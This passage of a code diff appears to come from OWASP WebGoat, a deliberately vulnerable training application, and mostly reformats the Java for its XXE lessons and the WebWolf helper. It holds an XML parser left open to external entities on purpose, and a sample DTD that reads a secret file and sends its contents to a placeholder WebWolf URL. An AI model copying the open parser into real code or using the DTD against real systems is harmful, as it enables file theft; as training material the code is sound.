+      var comments = userComments.getOrDefault(webSession.getUserName(), new Comments());
+      comments.add(comment);
+      userComments.put(webSession.getUser(), comments);
     }
+  }
 
-    protected Comments getComments() {
-        Comments allComments = new Comments();
-        Comments commentsByUser = userComments.get(webSession.getUser());
-        if (commentsByUser != null) {
-            allComments.addAll(commentsByUser);
-        }
-        allComments.addAll(comments);
-        allComments.sort();
-        return allComments;
-    }
-
-    /**
-     * Notice this parse method is not a "trick" to get the XXE working, we need to catch some of the exception which
-     * might happen during when users post message (we want to give feedback track progress etc). In real life the
-     * XmlMapper bean defined above will be used automatically and the Comment class can be directly used in the
-     * controller method (instead of a String)
-     */
-    protected Comment parseXml(String xml) throws JAXBException, XMLStreamException {
-        var jc = JAXBContext.newInstance(Comment.class);
-        var xif = XMLInputFactory.newInstance();
-
-        if (webSession.isSecurityEnabled()) {
-            xif.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
-            xif.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");  // compliant
-        }
-
-        var xsr = xif.createXMLStreamReader(new StringReader(xml));
-
-        var unmarshaller = jc.createUnmarshaller();
-        return (Comment) unmarshaller.unmarshal(xsr);
-    }
-
-    protected Optional<Comment> parseJson(String comment) {
-        ObjectMapper mapper = new ObjectMapper();
-        try {
-            return of(mapper.readValue(comment, Comment.class));
-        } catch (IOException e) {
-            return empty();
-        }
-    }
-
-    public void addComment(Comment comment, boolean visibleForAllUsers) {
-        comment.setDateTime(LocalDateTime.now().format(fmt));
-        comment.setUser(webSession.getUserName());
-        if (visibleForAllUsers) {
-            comments.add(comment);
-        } else {
-            var comments = userComments.getOrDefault(webSession.getUserName(), new Comments());
-            comments.add(comment);
-            userComments.put(webSession.getUser(), comments);
-        }
-    }
-
-    public void reset(WebGoatUser user) {
-        comments.clear();
-        userComments.remove(user);
-        initDefaultComments();
-    }
+  public void reset(WebGoatUser user) {
+    comments.clear();
+    userComments.remove(user);
+    initDefaultComments();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsEndpoint.java
index e5a43d0e2..721e649ea 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsEndpoint.java
@@ -22,6 +22,7 @@
 
 package org.owasp.webgoat.lessons.xxe;
 
+import java.util.Collection;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.GetMapping;
@@ -29,8 +30,6 @@ import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.util.Collection;
-
 /**
  * @author nbaars
  * @since 5/4/17.
@@ -39,13 +38,11 @@ import java.util.Collection;
 @RequestMapping("xxe/comments")
 public class CommentsEndpoint {
 
-    @Autowired
-    private CommentsCache comments;
-
-    @GetMapping(produces = MediaType.APPLICATION_JSON_VALUE)
-    @ResponseBody
-    public Collection<Comment> retrieveComments() {
-        return comments.getComments();
-    }
+  @Autowired private CommentsCache comments;
 
+  @GetMapping(produces = MediaType.APPLICATION_JSON_VALUE)
+  @ResponseBody
+  public Collection<Comment> retrieveComments() {
+    return comments.getComments();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignment.java b/src/main/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignment.java
index 085d097ee..2e54dc1d8 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignment.java
@@ -22,6 +22,9 @@
 
 package org.owasp.webgoat.lessons.xxe;
 
+import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
+
+import javax.servlet.http.HttpServletRequest;
 import org.apache.commons.exec.OS;
 import org.apache.commons.lang3.exception.ExceptionUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
@@ -37,58 +40,61 @@ import org.springframework.web.bind.annotation.RequestHeader;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletRequest;
-
-import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
-
 @RestController
 @AssignmentHints({"xxe.hints.content.type.xxe.1", "xxe.hints.content.type.xxe.2"})
 public class ContentTypeAssignment extends AssignmentEndpoint {
 
-    private static final String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};
-    private static final String[] DEFAULT_WINDOWS_DIRECTORIES = {"Windows", "Program Files (x86)", "Program Files", "pagefile.sys"};
+  private static final String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};
+  private static final String[] DEFAULT_WINDOWS_DIRECTORIES = {
+    "Windows", "Program Files (x86)", "Program Files", "pagefile.sys"
+  };
 
-    @Value("${webgoat.server.directory}")
-    private String webGoatHomeDirectory;
-    @Autowired
-    private WebSession webSession;
-    @Autowired
-    private CommentsCache comments;
+  @Value("${webgoat.server.directory}")
+  private String webGoatHomeDirectory;
 
-    @PostMapping(path = "xxe/content-type")
-    @ResponseBody
-    public AttackResult createNewUser(HttpServletRequest request, @RequestBody String commentStr, @RequestHeader("Content-Type") String contentType) throws Exception {
-        AttackResult attackResult = failed(this).build();
+  @Autowired private WebSession webSession;
+  @Autowired private CommentsCache comments;
 
-        if (APPLICATION_JSON_VALUE.equals(contentType)) {
-            comments.parseJson(commentStr).ifPresent(c -> comments.addComment(c, true));
-            attackResult = failed(this).feedback("xxe.content.type.feedback.json").build();
-        }
+  @PostMapping(path = "xxe/content-type")
+  @ResponseBody
+  public AttackResult createNewUser(
+      HttpServletRequest request,
+      @RequestBody String commentStr,
+      @RequestHeader("Content-Type") String contentType)
+      throws Exception {
+    AttackResult attackResult = failed(this).build();
 
-        if (null != contentType && contentType.contains(MediaType.APPLICATION_XML_VALUE)) {
-            String error = "";
-            try {
-                Comment comment = comments.parseXml(commentStr);
-                comments.addComment(comment, false);
-                if (checkSolution(comment)) {
-                    attackResult = success(this).build();
-                }
-            } catch (Exception e) {
-                error = ExceptionUtils.getStackTrace(e);
-                attackResult = failed(this).feedback("xxe.content.type.feedback.xml").output(error).build();
-            }
-        }
-
-        return attackResult;
+    if (APPLICATION_JSON_VALUE.equals(contentType)) {
+      comments.parseJson(commentStr).ifPresent(c -> comments.addComment(c, true));
+      attackResult = failed(this).feedback("xxe.content.type.feedback.json").build();
     }
 
-    private boolean checkSolution(Comment comment) {
-        String[] directoriesToCheck = OS.isFamilyMac() || OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
-        boolean success = false;
-        for (String directory : directoriesToCheck) {
-            success |= org.apache.commons.lang3.StringUtils.contains(comment.getText(), directory);
+    if (null != contentType && contentType.contains(MediaType.APPLICATION_XML_VALUE)) {
+      String error = "";
+      try {
+        Comment comment = comments.parseXml(commentStr);
+        comments.addComment(comment, false);
+        if (checkSolution(comment)) {
+          attackResult = success(this).build();
         }
-        return success;
+      } catch (Exception e) {
+        error = ExceptionUtils.getStackTrace(e);
+        attackResult = failed(this).feedback("xxe.content.type.feedback.xml").output(error).build();
+      }
     }
 
+    return attackResult;
+  }
+
+  private boolean checkSolution(Comment comment) {
+    String[] directoriesToCheck =
+        OS.isFamilyMac() || OS.isFamilyUnix()
+            ? DEFAULT_LINUX_DIRECTORIES
+            : DEFAULT_WINDOWS_DIRECTORIES;
+    boolean success = false;
+    for (String directory : directoriesToCheck) {
+      success |= org.apache.commons.lang3.StringUtils.contains(comment.getText(), directory);
+    }
+    return success;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xxe/Ping.java b/src/main/java/org/owasp/webgoat/lessons/xxe/Ping.java
index 12a270dc5..f71dbd7dd 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xxe/Ping.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/Ping.java
@@ -22,6 +22,9 @@
 
 package org.owasp.webgoat.lessons.xxe;
 
+import java.io.File;
+import java.io.FileNotFoundException;
+import java.io.PrintWriter;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.beans.factory.annotation.Autowired;
@@ -32,31 +35,28 @@ import org.springframework.web.bind.annotation.RequestMethod;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 
-import java.io.File;
-import java.io.FileNotFoundException;
-import java.io.PrintWriter;
-
 @Slf4j
 public class Ping {
 
-    @Value("${webgoat.user.directory}")
-    private String webGoatHomeDirectory;
-    @Autowired
-    private WebSession webSession;
+  @Value("${webgoat.user.directory}")
+  private String webGoatHomeDirectory;
 
-    @RequestMapping(method = RequestMethod.GET)
-    @ResponseBody
-    public String logRequest(@RequestHeader("User-Agent") String userAgent, @RequestParam(required = false) String text) {
-        String logLine = String.format("%s %s %s", "GET", userAgent, text);
-        log.debug(logLine);
-        File logFile = new File(webGoatHomeDirectory, "/XXE/log" + webSession.getUserName() + ".txt");
-        try {
-            try (PrintWriter pw = new PrintWriter(logFile)) {
-                pw.println(logLine);
-            }
-        } catch (FileNotFoundException e) {
-            log.error("Error occurred while writing the logfile", e);
-        }
-        return "";
+  @Autowired private WebSession webSession;
+
+  @RequestMapping(method = RequestMethod.GET)
+  @ResponseBody
+  public String logRequest(
+      @RequestHeader("User-Agent") String userAgent, @RequestParam(required = false) String text) {
+    String logLine = String.format("%s %s %s", "GET", userAgent, text);
+    log.debug(logLine);
+    File logFile = new File(webGoatHomeDirectory, "/XXE/log" + webSession.getUserName() + ".txt");
+    try {
+      try (PrintWriter pw = new PrintWriter(logFile)) {
+        pw.println(logLine);
+      }
+    } catch (FileNotFoundException e) {
+      log.error("Error occurred while writing the logfile", e);
     }
+    return "";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xxe/SimpleXXE.java b/src/main/java/org/owasp/webgoat/lessons/xxe/SimpleXXE.java
index 37893cd73..d51712cd4 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xxe/SimpleXXE.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/SimpleXXE.java
@@ -22,6 +22,10 @@
 
 package org.owasp.webgoat.lessons.xxe;
 
+import static org.springframework.http.MediaType.ALL_VALUE;
+import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
+
+import javax.servlet.http.HttpServletRequest;
 import org.apache.commons.exec.OS;
 import org.apache.commons.lang3.exception.ExceptionUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
@@ -36,67 +40,73 @@ import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.servlet.http.HttpServletRequest;
-
-import static org.springframework.http.MediaType.ALL_VALUE;
-import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
-
-
 /**
  * @author nbaars
  * @since 4/8/17.
  */
 @RestController
-@AssignmentHints({"xxe.hints.simple.xxe.1", "xxe.hints.simple.xxe.2", "xxe.hints.simple.xxe.3", "xxe.hints.simple.xxe.4", "xxe.hints.simple.xxe.5", "xxe.hints.simple.xxe.6"})
+@AssignmentHints({
+  "xxe.hints.simple.xxe.1",
+  "xxe.hints.simple.xxe.2",
+  "xxe.hints.simple.xxe.3",
+  "xxe.hints.simple.xxe.4",
+  "xxe.hints.simple.xxe.5",
+  "xxe.hints.simple.xxe.6"
+})
 public class SimpleXXE extends AssignmentEndpoint {
 
-    private static final String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};
-    private static final String[] DEFAULT_WINDOWS_DIRECTORIES = {"Windows", "Program Files (x86)", "Program Files", "pagefile.sys"};
+  private static final String[] DEFAULT_LINUX_DIRECTORIES = {"usr", "etc", "var"};
+  private static final String[] DEFAULT_WINDOWS_DIRECTORIES = {
+    "Windows", "Program Files (x86)", "Program Files", "pagefile.sys"
+  };
 
-    @Value("${webgoat.server.directory}")
-    private String webGoatHomeDirectory;
+  @Value("${webgoat.server.directory}")
+  private String webGoatHomeDirectory;
 
-    @Value("${webwolf.landingpage.url}")
-    private String webWolfURL;
+  @Value("${webwolf.landingpage.url}")
+  private String webWolfURL;
 
+  @Autowired private CommentsCache comments;
 
-    @Autowired
-    private CommentsCache comments;
-
-    @PostMapping(path = "xxe/simple", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
-    @ResponseBody
-    public AttackResult createNewComment(HttpServletRequest request, @RequestBody String commentStr) {
-        String error = "";
-        try {
-            var comment = comments.parseXml(commentStr);
-            comments.addComment(comment, false);
-            if (checkSolution(comment)) {
-                return success(this).build();
-            }
-        } catch (Exception e) {
-            error = ExceptionUtils.getStackTrace(e);
-        }
-        return failed(this).output(error).build();
+  @PostMapping(path = "xxe/simple", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
+  @ResponseBody
+  public AttackResult createNewComment(HttpServletRequest request, @RequestBody String commentStr) {
+    String error = "";
+    try {
+      var comment = comments.parseXml(commentStr);
+      comments.addComment(comment, false);
+      if (checkSolution(comment)) {
+        return success(this).build();
+      }
+    } catch (Exception e) {
+      error = ExceptionUtils.getStackTrace(e);
     }
+    return failed(this).output(error).build();
+  }
 
-    private boolean checkSolution(Comment comment) {
-        String[] directoriesToCheck = OS.isFamilyMac() || OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
-        boolean success = false;
-        for (String directory : directoriesToCheck) {
-            success |= org.apache.commons.lang3.StringUtils.contains(comment.getText(), directory);
-        }
-        return success;
+  private boolean checkSolution(Comment comment) {
+    String[] directoriesToCheck =
+        OS.isFamilyMac() || OS.isFamilyUnix()
+            ? DEFAULT_LINUX_DIRECTORIES
+            : DEFAULT_WINDOWS_DIRECTORIES;
+    boolean success = false;
+    for (String directory : directoriesToCheck) {
+      success |= org.apache.commons.lang3.StringUtils.contains(comment.getText(), directory);
     }
+    return success;
+  }
 
-    @RequestMapping(path = "/xxe/sampledtd", consumes = ALL_VALUE, produces = MediaType.TEXT_PLAIN_VALUE)
-    @ResponseBody
-    public String getSampleDTDFile() {
-        return """
+  @RequestMapping(
+      path = "/xxe/sampledtd",
+      consumes = ALL_VALUE,
+      produces = MediaType.TEXT_PLAIN_VALUE)
+  @ResponseBody
+  public String getSampleDTDFile() {
+    return """
                 <?xml version="1.0" encoding="UTF-8"?>
                 <!ENTITY % file SYSTEM "file:replace-this-by-webgoat-temp-directory/XXE/secret.txt">
                 <!ENTITY % all "<!ENTITY send SYSTEM 'http://replace-this-by-webwolf-base-url/landing?text=%file;'>">
                 %all;
                 """;
-    }
-
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xxe/User.java b/src/main/java/org/owasp/webgoat/lessons/xxe/User.java
index d32a2ef37..bca81e474 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xxe/User.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/User.java
@@ -27,23 +27,22 @@ import javax.xml.bind.annotation.XmlRootElement;
 @XmlRootElement
 public class User {
 
-    private String username = "";
-    private String password = "";
+  private String username = "";
+  private String password = "";
 
-    public String getPassword() {
-        return password;
-    }
+  public String getPassword() {
+    return password;
+  }
 
-    public void setPassword(String password) {
-        this.password = password;
-    }
+  public void setPassword(String password) {
+    this.password = password;
+  }
 
-    public String getUsername() {
-        return username;
-    }
-
-    public void setUsername(String username) {
-        this.username = username;
-    }
+  public String getUsername() {
+    return username;
+  }
 
+  public void setUsername(String username) {
+    this.username = username;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java b/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
index fd6d8f631..e44c31851 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
@@ -29,13 +29,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class XXE extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A3;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A3;
+  }
 
-    @Override
-    public String getTitle() {
-        return "xxe.title";
-    }
+  @Override
+  public String getTitle() {
+    return "xxe.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/server/ParentConfig.java b/src/main/java/org/owasp/webgoat/server/ParentConfig.java
index be8199693..b4a62db4d 100644
--- a/src/main/java/org/owasp/webgoat/server/ParentConfig.java
+++ b/src/main/java/org/owasp/webgoat/server/ParentConfig.java
@@ -5,6 +5,4 @@ import org.springframework.context.annotation.Configuration;
 
 @Configuration
 @ComponentScan("org.owasp.webgoat.server")
-public class ParentConfig {
-
-}
+public class ParentConfig {}
diff --git a/src/main/java/org/owasp/webgoat/server/StartWebGoat.java b/src/main/java/org/owasp/webgoat/server/StartWebGoat.java
index c62dc6414..845a057ac 100644
--- a/src/main/java/org/owasp/webgoat/server/StartWebGoat.java
+++ b/src/main/java/org/owasp/webgoat/server/StartWebGoat.java
@@ -35,13 +35,16 @@ import org.springframework.boot.builder.SpringApplicationBuilder;
 @Slf4j
 public class StartWebGoat {
 
-    public static void main(String[] args) {
-        new SpringApplicationBuilder().parent(ParentConfig.class)
-                .web(WebApplicationType.NONE).bannerMode(Banner.Mode.OFF)
-                .child(WebGoat.class)
-                .web(WebApplicationType.SERVLET)
-                .sibling(WebWolf.class).bannerMode(Banner.Mode.OFF)
-                .web(WebApplicationType.SERVLET)
-                .run(args);
-    }
+  public static void main(String[] args) {
+    new SpringApplicationBuilder()
+        .parent(ParentConfig.class)
+        .web(WebApplicationType.NONE)
+        .bannerMode(Banner.Mode.OFF)
+        .child(WebGoat.class)
+        .web(WebApplicationType.SERVLET)
+        .sibling(WebWolf.class)
+        .bannerMode(Banner.Mode.OFF)
+        .web(WebApplicationType.SERVLET)
+        .run(args);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/server/StartupMessage.java b/src/main/java/org/owasp/webgoat/server/StartupMessage.java
index 9395d3bb4..409ffb377 100644
--- a/src/main/java/org/owasp/webgoat/server/StartupMessage.java
+++ b/src/main/java/org/owasp/webgoat/server/StartupMessage.java
@@ -13,21 +13,21 @@ import org.springframework.util.StringUtils;
 @NoArgsConstructor
 public class StartupMessage {
 
-    private String port;
-    private String address;
+  private String port;
+  private String address;
 
-    @EventListener
-    void onStartup(ApplicationReadyEvent event) {
-        if (StringUtils.hasText(port) && !StringUtils.hasText(System.getProperty("running.in.docker"))) {
-            log.info("Please browse to http://{}:{}/WebGoat to get started...", address, port);
-        }
-        if (event.getApplicationContext().getApplicationName().contains("WebGoat")) {
-            port = event.getApplicationContext().getEnvironment().getProperty("server.port");
-            address = event.getApplicationContext().getEnvironment().getProperty("server.address");
-        }
+  @EventListener
+  void onStartup(ApplicationReadyEvent event) {
+    if (StringUtils.hasText(port)
+        && !StringUtils.hasText(System.getProperty("running.in.docker"))) {
+      log.info("Please browse to http://{}:{}/WebGoat to get started...", address, port);
     }
+    if (event.getApplicationContext().getApplicationName().contains("WebGoat")) {
+      port = event.getApplicationContext().getEnvironment().getProperty("server.port");
+      address = event.getApplicationContext().getEnvironment().getProperty("server.address");
+    }
+  }
 
-    @EventListener
-    void onShutdown(ContextStoppedEvent event) {
-    }
+  @EventListener
+  void onShutdown(ContextStoppedEvent event) {}
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/FileServer.java b/src/main/java/org/owasp/webgoat/webwolf/FileServer.java
index 4cb608545..a23af4ce7 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/FileServer.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/FileServer.java
@@ -22,6 +22,12 @@
 
 package org.owasp.webgoat.webwolf;
 
+import static org.springframework.http.MediaType.ALL_VALUE;
+
+import java.io.File;
+import java.io.IOException;
+import java.util.ArrayList;
+import javax.servlet.http.HttpServletRequest;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import lombok.extern.slf4j.Slf4j;
@@ -41,81 +47,77 @@ import org.springframework.web.multipart.MultipartFile;
 import org.springframework.web.servlet.ModelAndView;
 import org.springframework.web.servlet.view.RedirectView;
 
-import javax.servlet.http.HttpServletRequest;
-import java.io.File;
-import java.io.IOException;
-import java.util.ArrayList;
-
-import static org.springframework.http.MediaType.ALL_VALUE;
-
-/**
- * Controller for uploading a file
- */
+/** Controller for uploading a file */
 @Controller
 @Slf4j
 public class FileServer {
 
-    @Value("${webwolf.fileserver.location}")
-    private String fileLocation;
-    @Value("${server.address}")
-    private String server;
-    @Value("${server.port}")
-    private int port;
+  @Value("${webwolf.fileserver.location}")
+  private String fileLocation;
 
-    @RequestMapping(path = "/file-server-location", consumes = ALL_VALUE, produces = MediaType.TEXT_PLAIN_VALUE)
-    @ResponseBody
-    public String getFileLocation() {
-        return fileLocation;
+  @Value("${server.address}")
+  private String server;
+
+  @Value("${server.port}")
+  private int port;
+
+  @RequestMapping(
+      path = "/file-server-location",
+      consumes = ALL_VALUE,
+      produces = MediaType.TEXT_PLAIN_VALUE)
+  @ResponseBody
+  public String getFileLocation() {
+    return fileLocation;
+  }
+
+  @PostMapping(value = "/fileupload")
+  public ModelAndView importFile(@RequestParam("file") MultipartFile myFile) throws IOException {
+    var user = (WebGoatUser) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
+    var destinationDir = new File(fileLocation, user.getUsername());
+    destinationDir.mkdirs();
+    myFile.transferTo(new File(destinationDir, myFile.getOriginalFilename()));
+    log.debug("File saved to {}", new File(destinationDir, myFile.getOriginalFilename()));
+
+    return new ModelAndView(
+        new RedirectView("files", true),
+        new ModelMap().addAttribute("uploadSuccess", "File uploaded successful"));
+  }
+
+  @AllArgsConstructor
+  @Getter
+  private class UploadedFile {
+    private final String name;
+    private final String size;
+    private final String link;
+  }
+
+  @GetMapping(value = "/files")
+  public ModelAndView getFiles(HttpServletRequest request) {
+    WebGoatUser user =
+        (WebGoatUser) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
+    String username = user.getUsername();
+    File destinationDir = new File(fileLocation, username);
+
+    ModelAndView modelAndView = new ModelAndView();
+    modelAndView.setViewName("files");
+    File changeIndicatorFile = new File(destinationDir, user.getUsername() + "_changed");
+    if (changeIndicatorFile.exists()) {
+      modelAndView.addObject("uploadSuccess", request.getParameter("uploadSuccess"));
+    }
+    changeIndicatorFile.delete();
+
+    var uploadedFiles = new ArrayList<>();
+    File[] files = destinationDir.listFiles(File::isFile);
+    if (files != null) {
+      for (File file : files) {
+        String size = FileUtils.byteCountToDisplaySize(file.length());
+        String link = String.format("files/%s/%s", username, file.getName());
+        uploadedFiles.add(new UploadedFile(file.getName(), size, link));
+      }
     }
 
-    @PostMapping(value = "/fileupload")
-    public ModelAndView importFile(@RequestParam("file") MultipartFile myFile) throws IOException {
-        var user = (WebGoatUser) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
-        var destinationDir = new File(fileLocation, user.getUsername());
-        destinationDir.mkdirs();
-        myFile.transferTo(new File(destinationDir, myFile.getOriginalFilename()));
-        log.debug("File saved to {}", new File(destinationDir, myFile.getOriginalFilename()));
-
-        return new ModelAndView(
-                new RedirectView("files", true),
-                new ModelMap().addAttribute("uploadSuccess", "File uploaded successful")
-        );
-    }
-
-    @AllArgsConstructor
-    @Getter
-    private class UploadedFile {
-        private final String name;
-        private final String size;
-        private final String link;
-    }
-
-    @GetMapping(value = "/files")
-    public ModelAndView getFiles(HttpServletRequest request) {
-        WebGoatUser user = (WebGoatUser) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
-        String username = user.getUsername();
-        File destinationDir = new File(fileLocation, username);
-
-        ModelAndView modelAndView = new ModelAndView();
-        modelAndView.setViewName("files");
-        File changeIndicatorFile = new File(destinationDir, user.getUsername() + "_changed");
-        if (changeIndicatorFile.exists()) {
-            modelAndView.addObject("uploadSuccess", request.getParameter("uploadSuccess"));
-        }
-        changeIndicatorFile.delete();
-
-        var uploadedFiles = new ArrayList<>();
-        File[] files = destinationDir.listFiles(File::isFile);
-        if (files != null) {
-            for (File file : files) {
-                String size = FileUtils.byteCountToDisplaySize(file.length());
-                String link = String.format("files/%s/%s", username, file.getName());
-                uploadedFiles.add(new UploadedFile(file.getName(), size, link));
-            }
-        }
-
-        modelAndView.addObject("files", uploadedFiles);
-        modelAndView.addObject("webwolf_url", "http://" + server + ":" + port);
-        return modelAndView;
-    }
+    modelAndView.addObject("files", uploadedFiles);
+    modelAndView.addObject("webwolf_url", "http://" + server + ":" + port);
+    return modelAndView;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/MvcConfiguration.java b/src/main/java/org/owasp/webgoat/webwolf/MvcConfiguration.java
index 836c1413f..f5fec0777 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/MvcConfiguration.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/MvcConfiguration.java
@@ -22,15 +22,14 @@
 
 package org.owasp.webgoat.webwolf;
 
+import java.io.File;
+import javax.annotation.PostConstruct;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.context.annotation.Configuration;
 import org.springframework.web.servlet.config.annotation.ResourceHandlerRegistry;
 import org.springframework.web.servlet.config.annotation.ViewControllerRegistry;
 import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
 
-import javax.annotation.PostConstruct;
-import java.io.File;
-
 /**
  * @author nbaars
  * @since 8/13/17.
@@ -38,29 +37,31 @@ import java.io.File;
 @Configuration
 public class MvcConfiguration implements WebMvcConfigurer {
 
-    @Value("${webwolf.fileserver.location}")
-    private String fileLocation;
+  @Value("${webwolf.fileserver.location}")
+  private String fileLocation;
 
-    @Override
-    public void addResourceHandlers(ResourceHandlerRegistry registry) {
-        registry.addResourceHandler("/files/**").addResourceLocations("file:///" + fileLocation + "/");
+  @Override
+  public void addResourceHandlers(ResourceHandlerRegistry registry) {
+    registry.addResourceHandler("/files/**").addResourceLocations("file:///" + fileLocation + "/");
 
-        registry.addResourceHandler("/css/**").addResourceLocations("classpath:/webwolf/static/css/");
-        registry.addResourceHandler("/js/**").addResourceLocations("classpath:/webwolf/static/js/");
-        registry.addResourceHandler("/images/**").addResourceLocations("classpath:/webwolf/static/images/");
-    }
-
-    @Override
-    public void addViewControllers(ViewControllerRegistry registry) {
-        registry.addViewController("/login").setViewName("webwolf-login");
-        registry.addViewController("/home").setViewName("home");
-    }
-
-    @PostConstruct
-    public void createDirectory() {
-        File file = new File(fileLocation);
-        if (!file.exists()) {
-            file.mkdirs();
-        }
+    registry.addResourceHandler("/css/**").addResourceLocations("classpath:/webwolf/static/css/");
+    registry.addResourceHandler("/js/**").addResourceLocations("classpath:/webwolf/static/js/");
+    registry
+        .addResourceHandler("/images/**")
+        .addResourceLocations("classpath:/webwolf/static/images/");
+  }
+
+  @Override
+  public void addViewControllers(ViewControllerRegistry registry) {
+    registry.addViewController("/login").setViewName("webwolf-login");
+    registry.addViewController("/home").setViewName("home");
+  }
+
+  @PostConstruct
+  public void createDirectory() {
+    File file = new File(fileLocation);
+    if (!file.exists()) {
+      file.mkdirs();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/WebSecurityConfig.java b/src/main/java/org/owasp/webgoat/webwolf/WebSecurityConfig.java
index f867ea0bd..7afa030af 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/WebSecurityConfig.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/WebSecurityConfig.java
@@ -1,4 +1,3 @@
-
 /*
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
  *
@@ -37,55 +36,50 @@ import org.springframework.security.config.annotation.web.configurers.Expression
 import org.springframework.security.core.userdetails.UserDetailsService;
 import org.springframework.security.crypto.password.NoOpPasswordEncoder;
 
-/**
- * Security configuration for WebGoat.
- */
+/** Security configuration for WebGoat. */
 @Configuration
 @AllArgsConstructor
 @EnableWebSecurity
 public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
 
-    private final UserService userDetailsService;
+  private final UserService userDetailsService;
 
-    @Override
-    protected void configure(HttpSecurity http) throws Exception {
-        ExpressionUrlAuthorizationConfigurer<HttpSecurity>.ExpressionInterceptUrlRegistry security = http
-                .authorizeRequests()
-                .antMatchers("/css/**", "/images/**", "/js/**", "/fonts/**", "/webjars/**", "/home").permitAll()
-                .antMatchers(HttpMethod.GET, "/mail/**", "/requests/**").authenticated()
-                .antMatchers("/files").authenticated()
-                .anyRequest().permitAll();
-        security.and().csrf().disable().formLogin()
-                .loginPage("/login").failureUrl("/login?error=true");
-        security.and()
-                .formLogin()
-                .loginPage("/login")
-                .defaultSuccessUrl("/home", true)
-                .permitAll();
-        security.and()
-                .logout()
-                .permitAll();
-    }
+  @Override
+  protected void configure(HttpSecurity http) throws Exception {
+    ExpressionUrlAuthorizationConfigurer<HttpSecurity>.ExpressionInterceptUrlRegistry security =
+        http.authorizeRequests()
+            .antMatchers("/css/**", "/images/**", "/js/**", "/fonts/**", "/webjars/**", "/home")
+            .permitAll()
+            .antMatchers(HttpMethod.GET, "/mail/**", "/requests/**")
+            .authenticated()
+            .antMatchers("/files")
+            .authenticated()
+            .anyRequest()
+            .permitAll();
+    security.and().csrf().disable().formLogin().loginPage("/login").failureUrl("/login?error=true");
+    security.and().formLogin().loginPage("/login").defaultSuccessUrl("/home", true).permitAll();
+    security.and().logout().permitAll();
+  }
 
-    @Autowired
-    public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
